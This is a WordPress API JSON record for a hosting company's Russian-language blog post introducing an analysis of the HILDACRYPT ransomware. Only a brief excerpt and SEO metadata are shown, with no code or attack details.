\u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u041f\u041e. \u0421\u0435\u0433\u043e\u0434\u043d\u044f \u043c\u044b \u0437\u043d\u0430\u043a\u043e\u043c\u0438\u043c\u0441\u044f \u0441 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u043c\u0438 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u044f\u043c\u0438 \u0440\u0430\u0431\u043e\u0442\u044b \u044d\u0442\u043e\u0433\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u0438\u0440\u0443\u0441\u0430-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044f. \u0412 \u043f\u0435\u0440\u0432\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0435\u0439 Hilda [&hellip;]<\/p>\n","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[688],"tags":[],"class_list":["post-52277","post","type-post","status-publish","format-standard","hentry","category-administrirovanie"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 5.0.2.1 - aioseo.com -->\n\t<meta name=\"description\" content=\"\u041f\u0440\u0438\u0432\u0435\u0442, \u0425\u0430\u0431\u0440! \u0418 \u0441\u043d\u043e\u0432\u0430 \u043c\u044b \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u043c \u043e \u0441\u0432\u0435\u0436\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e \u0438\u0437 \u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u0438 Ransomware.\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"Yuri Gagarin\"\/>\n\t<link rel=\"canonical\" href=\"https:\/\/prohoster.info\/fr\/blog\/administrirovanie\/hildacrypt-novaya-programma-vymogatel-nanosit-udar-po-sistemam-rezervnogo-kopirovaniya-i-antivirusnym-resheniyam\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 5.0.2.1\" \/>\n\t\t<meta property=\"og:locale\" content=\"fr_FR\" \/>\n\t\t<meta property=\"og:site_name\" content=\"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"\ud83e\udd47HILDACRYPT: \u043d\u043e\u0432\u0430\u044f \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c \u043d\u0430\u043d\u043e\u0441\u0438\u0442 \u0443\u0434\u0430\u0440 \u043f\u043e \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c \u0440\u0435\u0437\u0435\u0440\u0432\u043d\u043e\u0433\u043e \u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0438 \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043d\u044b\u043c \u0440\u0435\u0448\u0435\u043d\u0438\u044f\u043c | ProHoster\" \/>\n\t\t<meta property=\"og:description\" content=\"\u041f\u0440\u0438\u0432\u0435\u0442, \u0425\u0430\u0431\u0440! \u0418 \u0441\u043d\u043e\u0432\u0430 \u043c\u044b \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u043c \u043e \u0441\u0432\u0435\u0436\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e \u0438\u0437 \u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u0438 Ransomware.\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/prohoster.info\/fr\/blog\/administrirovanie\/hildacrypt-novaya-programma-vymogatel-nanosit-udar-po-sistemam-rezervnogo-kopirovaniya-i-antivirusnym-resheniyam\" \/>\n\t\t<meta property=\"og:image\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:secure_url\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:width\" content=\"350\" \/>\n\t\t<meta property=\"og:image:height\" content=\"350\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2019-11-04T21:00:00+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2020-02-18T10:59:57+00:00\" \/>\n\t\t<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"\ud83e\udd47HILDACRYPT : un nouveau ransomware frappe les syst\u00e8mes de sauvegarde et les solutions antivirus | ProHoster","description":"Bonjour, Habr ! Nous revenons \u00e0 nouveau pour vous parler des nouvelles versions de logiciels malveillants de la cat\u00e9gorie Ransomware.","canonical_url":"https:\/\/prohoster.info\/fr\/blog\/administrirovanie\/hildacrypt-novaya-programma-vymogatel-nanosit-udar-po-sistemam-rezervnogo-kopirovaniya-i-antivirusnym-resheniyam","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":null,"og:locale":"fr_FR","og:site_name":"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b","og:type":"article","og:title":"\ud83e\udd47HILDACRYPT: \u043d\u043e\u0432\u0430\u044f \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c \u043d\u0430\u043d\u043e\u0441\u0438\u0442 \u0443\u0434\u0430\u0440 \u043f\u043e \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c \u0440\u0435\u0437\u0435\u0440\u0432\u043d\u043e\u0433\u043e \u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0438 \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043d\u044b\u043c \u0440\u0435\u0448\u0435\u043d\u0438\u044f\u043c | ProHoster","og:description":"\u041f\u0440\u0438\u0432\u0435\u0442, \u0425\u0430\u0431\u0440! \u0418 \u0441\u043d\u043e\u0432\u0430 \u043c\u044b \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u043c \u043e \u0441\u0432\u0435\u0436\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e \u0438\u0437 \u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u0438 Ransomware.","og:url":"https:\/\/prohoster.info\/fr\/blog\/administrirovanie\/hildacrypt-novaya-programma-vymogatel-nanosit-udar-po-sistemam-rezervnogo-kopirovaniya-i-antivirusnym-resheniyam","og:image":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:secure_url":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:width":350,"og:image:height":350,"article:published_time":"2019-11-04T21:00:00+00:00","article:modified_time":"2020-02-18T10:59:57+00:00","article:publisher":"https:\/\/www.facebook.com\/prohoster","article:author":"https:\/\/www.facebook.com\/prohoster"},"aioseo_meta_data":{"post_id":"52277","title":null,"description":null,"keywords":null,"keyphrases":null,"primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_url":null,"og_image_width":null,"og_image_height":null,"og_image_custom_url":null,"og_image_custom_fields":null,"og_video":null,"og_custom_url":null,"og_article_section":null,"og_article_tags":null,"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"","isEnabled":true},"graphs":[]},"schema_type":null,"schema_type_options":null,"pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":null,"robots_max_videopreview":null,"robots_max_imagepreview":"large","priority":null,"frequency":null,"local_seo":null,"seo_analyzer_scan_date":"2026-01-24 03:06:20","breadcrumb_settings":null,"limit_modified_date":false,"reviewed_by":null,"ai":null,"created":"2021-02-28 17:13:20","updated":"2026-01-24 03:06:20","focus_keyword":null,"additional_keywords":null,"truseo_locale":null},"gt_translate_keys":[{"key":"link","format":"url"}],"_links":{"self":[{"href":"https:\/\/prohoster.info\/fr\/wp-json\/wp\/v2\/posts\/52277","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/prohoster.info\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prohoster.info\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prohoster.info\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prohoster.info\/fr\/wp-json\/wp\/v2\/comments?post=52277"}],"version-history":[{"count":0,"href":"https:\/\/prohoster.info\/fr\/wp-json\/wp\/v2\/posts\/52277\/revisions"}],"wp:attachment":[{"href":"https:\/\/prohoster.info\/fr\/wp-json\/wp\/v2\/media?parent=52277"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prohoster.info\/fr\/wp-json\/wp\/v2\/categories?post=52277"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prohoster.info\/fr\/wp-json\/wp\/v2\/tags?post=52277"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}